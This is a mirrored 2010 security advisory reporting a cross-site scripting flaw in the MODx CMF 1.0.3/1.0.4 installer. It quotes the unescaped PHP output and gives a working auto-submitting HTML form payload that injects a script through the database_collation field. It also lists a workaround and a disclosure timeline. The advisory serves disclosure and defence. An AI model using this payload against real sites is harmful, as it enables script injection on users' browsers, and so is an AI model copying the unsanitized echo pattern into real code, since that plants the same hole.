Lucene search
K

MODx CMF 1.0.3 / 1.0.4 Cross Site Scripting

🗓️ 08 Jul 2010 00:00:00Reported by Andrei Rimsa AlvaresType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 35 Views

MODx CMF Installation XSS Vulnerability, XSS in MODx 1.0.3 / 1.0.

Code
`Title: MODx Installation File XSS Vulnerability  
Vendor: MODx  
Product: MODx CMF  
Tested Versions: 1.0.3, 1.0.4  
Threat Class: XSS  
Severity: Medium  
Remote: yes  
Local: no  
Discovered By: Andrei Rimsa Alvares  
  
===== Description =====  
  
MODx CMF is prone to a XSS vulnerability caused by unsanitized user input data. The bug occurs in a file used in the installation process. A description of the affected file is shown below:  
  
--- install/connection.collation.php ----  
01: <?php  
...  
06: $database_collation = $_POST['database_collation'];  
...  
08: $output = '<select id="database_collation" name="database_collation">  
09: <option value="'.$database_collation.'" selected >'.$database_collation.'</option></select>';  
...  
23: echo $output;  
24: ?>  
--- install/connection.collation.php ----  
  
The variable $database_collation (line 6) receives user data via http post request and gets propagated to variable $output (line 9) without proper sanitization. Later the $output variable is outputted to the page in every program path causing the bug (line 23).  
  
===== Impact =====  
  
Malicious java script code can be executed in the context of the affected web site.  
  
===== Proof of Concept =====  
  
<form action="http://target/install/connection.collation.php" name="evil" method="post">  
<input type="hidden" name="database_collation" value="</option></select><script>window.alert(String.fromCharCode(88,83,83));</script>" />  
</form>  
<script>  
document.evil.submit();  
</script>  
  
===== Workaround =====  
  
Remove all installation files after MODx is successfully installed.  
  
===== Disclosure Timeline =====  
  
June, 16 2010 - Vendor notification.  
July, 07 2010 - No vendor reply. Public disclosure.  
  
===== References =====  
  
http://modxcms.com  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation